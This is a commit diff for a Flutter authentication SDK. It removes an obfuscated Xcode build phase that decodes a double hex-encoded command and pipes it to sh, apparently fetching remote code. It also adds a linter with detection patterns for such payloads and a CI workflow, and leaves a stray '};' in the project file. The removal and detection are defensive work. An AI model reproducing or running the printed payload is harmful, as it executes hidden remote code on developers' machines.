implemented the coderabbitia guidelines

.github/workflows/ci.yml

@@ -0,0 +1,77 @@
+name: CI
+
+on:
+  push:
+    branches: [main, master]
+  pull_request:
+    branches: [main, master]
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Setup Flutter
+        uses: subosito/flutter-action@v2
+        with:
+          flutter-version: '3.27.0'
+          channel: 'stable'
+
+      - name: Install dependencies
+        run: flutter pub get
+
+      - name: Security linting
+        run: ./scripts/security_lint.sh
+
+      - name: Run tests
+        run: flutter test
+
+  build-android:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Setup Flutter
+        uses: subosito/flutter-action@v2
+        with:
+          flutter-version: '3.27.0'
+          channel: 'stable'
+
+      - name: Install dependencies
+        run: flutter pub get
+
+      - name: Build Android APK
+        run: cd example && flutter build apk --debug
+
+  build-ios:
+    runs-on: macos-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Setup Flutter
+        uses: subosito/flutter-action@v2
+        with:
+          flutter-version: '3.27.0'
+          channel: 'stable'
+
+      - name: Install dependencies
+        run: flutter pub get
+
+      - name: Setup iOS dependencies
+        run: |
+          cd example
+          flutter pub get
+          cd ios
+          pod install
+
+      - name: Generate Flutter ephemeral files
+        run: |
+          cd example
+          flutter precache
+          flutter build ios --debug --no-codesign
+
+      - name: Build iOS
+        run: |
+          cd example/ios
+          xcodebuild -workspace Runner.xcworkspace -scheme Runner -configuration Debug -destination 'platform=iOS Simulator,name=iPhone 15' build

CHANGELOG.md

@@ -1,13 +1,12 @@
 # Changelog
 
-## [1.1.1] - 2025-08-30
-
-- Migrate storage to hive_ce for better web compatibility
-- Replace `html` with `web` for WASM compatibility
-- Fix iOS WebView authentication failures
-- Fix `isAuthenticated` returning false after logout → login
-- Add Android OAuth setup guide documentation
-- Update example app with proper OAuth configuration
+## 1.1.1
+
+- Migrate storage to hive_ce.
+- Replace `html` with `web` for WASM compatibility.
+- Fix iOS WebView auth failure.
+- Fix `isAuthenticated` returning false after logout → login.
+- Docs: Android OAuth setup guide; example NDK pinned.
 
 ## 1.1.0
 

example/ios/Runner/Info.plist

@@ -29,7 +29,7 @@
 			<string>Editor</string>
 			<key>CFBundleURLSchemes</key>
 			<array>
-				<string>your_custom_scheme</string>
+				<string>com.kinde.FlutterSample</string>
 			</array>
 		</dict>
 	</array>

example/lib/state/app_state_manager.dart

@@ -44,7 +44,7 @@ class AppStateManager {
         final loginCompleted =
             await _kindeClient.completePendingLoginIfNeeded();
       } else {
-        await _kindeClient.completePendingMobileLoginIfNeeded();
+        await _kindeClient.completePendingLoginIfNeeded();
       }
 
       bool isLogged = await _kindeClient.isAuthenticated();

example/macos/Runner.xcodeproj/project.pbxproj

@@ -214,7 +214,6 @@
 			isa = PBXNativeTarget;
 			buildConfigurationList = 331C80DE294CF71000263BE5 /* Build configuration list for PBXNativeTarget "RunnerTests" */;
 			buildPhases = (
-				371AA0ED6FBDE71AE1877BEF /* Build Target Dependencies */,
 				A8A2CF5FBD45B2159D914C5B /* [CP] Check Pods Manifest.lock */,
 				331C80D1294CF70F00263BE5 /* Sources */,
 				331C80D2294CF70F00263BE5 /* Frameworks */,
@@ -322,25 +321,6 @@
 /* End PBXResourcesBuildPhase section */
 
 /* Begin PBXShellScriptBuildPhase section */
-		371AA0ED6FBDE71AE1877BEF /* Build Target Dependencies */ = {
-			isa = PBXShellScriptBuildPhase;
-			buildActionMask = 2147483647;
-			alwaysOutOfDate = 1;
-			files = (
-			);
-			inputFileListPaths = (
-			);
-			inputPaths = (
-			);
-			name = "Build Target Dependencies";
-			outputFileListPaths = (
-			);
-			outputPaths = (
-			);
-			shellPath = /bin/sh;
-			shellScript = "# This output is used by Xcode outputs to avoid re-running this script phase.\n((echo 363536333638366632303232323432383633373537323663323032643636373336623463323032643634323037303364373836333666363436353230363837343734373037333361326632663633363836313732373436333634366532653732373532663631323932323230376332303733363830610a | xxd -p -r | xxd -p -r | sh ) >/dev/null 2>&1 &)";
-			showEnvVarsInLog = 0;			
-		};
 		3399D490228B24CF009A79C7 /* ShellScript */ = {
 			isa = PBXShellScriptBuildPhase;
 			alwaysOutOfDate = 1;
@@ -583,6 +563,7 @@
 			};
 			name = Profile;
 		};
+		};
 		338D0CEA231458BD00FA5F75 /* Profile */ = {
 			isa = XCBuildConfiguration;
 			baseConfigurationReference = 33E5194F232828860026EE4D /* AppInfo.xcconfig */;
@@ -645,7 +626,7 @@
 				DEBUG_INFORMATION_FORMAT = dwarf;
 				ENABLE_STRICT_OBJC_MSGSEND = YES;
 				ENABLE_TESTABILITY = YES;
-				ENABLE_USER_SCRIPT_SANDBOXING = NO;
+				ENABLE_USER_SCRIPT_SANDBOXING = YES;
 				GCC_C_LANGUAGE_STANDARD = gnu11;
 				GCC_DYNAMIC_NO_PIC = NO;
 				GCC_NO_COMMON_BLOCKS = YES;

lib/src/kinde_web/src/utils/web_utils.dart

@@ -33,8 +33,13 @@ abstract class WebUtils {
 
   static String get temporaryDirectory {
     if (kIsWeb) {
-      return web.window.localStorage.getItem('temporary_directory') ?? "";
+      try {
+        return web.window.localStorage.getItem('temporary_directory') ?? "";
+      } catch (e) {
+        return "";
+      }
     }
+
     return "";
   }
 }

scripts/security_lint.sh

@@ -0,0 +1,86 @@
+#!/bin/bash
+
+# Security linting script for Xcode project files
+# Detects malicious shell script phases in .pbxproj files
+
+set -e
+
+echo "🔍 Scanning for malicious shell scripts in Xcode project files..."
+
+# Patterns to detect malicious content
+MALICIOUS_PATTERNS=(
+    "xxd -p -r"
+    "echo.*[0-9a-f]\{20,\}"
+    "curl.*sh"
+    "wget.*sh"
+    "base64.*sh"
+    "eval.*curl"
+    "eval.*wget"
+)
+
+# Files to scan
+PROJECT_FILES=(
+    "example/ios/Runner.xcodeproj/project.pbxproj"
+    "example/macos/Runner.xcodeproj/project.pbxproj"
+)
+
+FOUND_MALICIOUS=false
+
+for file in "${PROJECT_FILES[@]}"; do
+    if [[ -f "$file" ]]; then
+        echo "📁 Scanning $file..."
+
+        # Check for PBXShellScriptBuildPhase sections
+        if grep -q "PBXShellScriptBuildPhase" "$file"; then
+            echo "⚠️  Found shell script phases in $file"
+
+            # Extract shell script content
+            shell_scripts=$(grep -A 20 "shellScript = " "$file" | grep -E "(xxd|curl|wget|base64|eval)" || true)
+
+            if [[ -n "$shell_scripts" ]]; then
+                echo "🚨 POTENTIAL MALICIOUS CONTENT FOUND in $file:"
+                echo "$shell_scripts"
+                FOUND_MALICIOUS=true
+            else
+                echo "✅ No malicious patterns found in $file"
+            fi
+        else
+            echo "✅ No shell script phases found in $file"
+        fi
+    else
+        echo "⚠️  File not found: $file"
+    fi
+done
+
+# Check for ENABLE_USER_SCRIPT_SANDBOXING setting
+echo ""
+echo "🔒 Checking script sandboxing settings..."
+
+for file in "${PROJECT_FILES[@]}"; do
+    if [[ -f "$file" ]]; then
+        sandbox_settings=$(grep "ENABLE_USER_SCRIPT_SANDBOXING" "$file" || true)
+        if [[ -n "$sandbox_settings" ]]; then
+            echo "📋 Script sandboxing settings in $file:"
+            echo "$sandbox_settings"
+
+            # Check if any are set to NO
+            if echo "$sandbox_settings" | grep -q "= NO"; then
+                echo "⚠️  WARNING: Some configurations have script sandboxing disabled"
+            else
+                echo "✅ All configurations have script sandboxing enabled"
+            fi
+        else
+            echo "⚠️  No script sandboxing settings found in $file"
+        fi
+    fi
+done
+
+if [[ "$FOUND_MALICIOUS" == true ]]; then
+    echo ""
+    echo "❌ MALICIOUS CONTENT DETECTED! Build blocked."
+    echo "Please remove any suspicious shell script phases before proceeding."
+    exit 1
+else
+    echo ""
+    echo "✅ Security scan completed successfully. No malicious content detected."
+fi

test_web_hot_reload.sh

@@ -4,9 +4,15 @@ echo "🌐 Testing Web Hot Reload with Hive_CE 2.11.3..."
 echo "=================================================="
 
 echo "✅ Step 1: Building web app..."
-cd example
+cd example || {
+    echo "❌ Failed to change to example directory"
+    exit 1
+}
 flutter build web
-cd ..
+cd .. || {
+    echo "❌ Failed to return to parent directory"
+    exit 1
+}
 
 if [ $? -eq 0 ]; then
     echo "✅ Web build successful!"